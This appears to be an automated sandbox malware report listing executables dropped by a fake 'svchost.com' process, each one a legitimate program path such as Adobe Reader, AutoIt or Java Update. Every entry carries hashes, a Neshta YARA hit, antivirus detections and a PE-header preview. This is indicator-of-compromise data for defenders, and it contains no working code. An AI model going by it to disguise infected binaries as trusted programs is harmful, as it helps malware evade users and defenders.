                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.079745714518026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352749197508949
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.395396839059979
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.509452568334581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.476428579556002
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.520333669037674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.481287941039048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):7.2906774035349695
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.586052312714495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529393382316189
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.7205787223638
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.52588514314363
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5042461329985075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGhFAlQY7rMdInNwUdROnIDh+vE6YjhmnCu26W:sr85CAlQGrkInNwUPOnWh+vEzEnCh7
                                                                                                                        MD5:A5EA90AC4FC049DF79D7DB1814B9B326
                                                                                                                        SHA1:1AE4394BAB6F0CEB3F1EE611B460C0FD632E87C5
                                                                                                                        SHA-256:61B25B74A7126A96A87A8D313B850CEAD18B5AB5389E9FF2B2C9A164927A08D2
                                                                                                                        SHA-512:DC6FBDEB7D79AEDB4479A4D8742D15AAA4BEEE97892715406D58E0C5E1511073C85D91B287E7CA75DE376C0C9A6BC2A307115A646600261EDDD6DD287D5AD036
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.210368811104495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCed9fP4LXRxQyEvzDmxvuLX+:sr85Ca4dOyEv/mxmLO
                                                                                                                        MD5:27D5B0E45DB81F836CF687549F844753
                                                                                                                        SHA1:4EE8AF1DE81163B66C20D4D4C652250D3B116544
                                                                                                                        SHA-256:365857D447BD640AC5A1BA7F32AF69211AD8F7C3AA0345C925FADCD6635D8C44
                                                                                                                        SHA-512:42BC2AAE4F5371F7F6E21CA25A28578929C160C7B0DD629239BF1C1F47C1E59AC5E56E1E33C8C1B074FE5393A88076F214D73729074E72A2AF1F6F83386A573A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.599158686971261
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6085003171859364
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
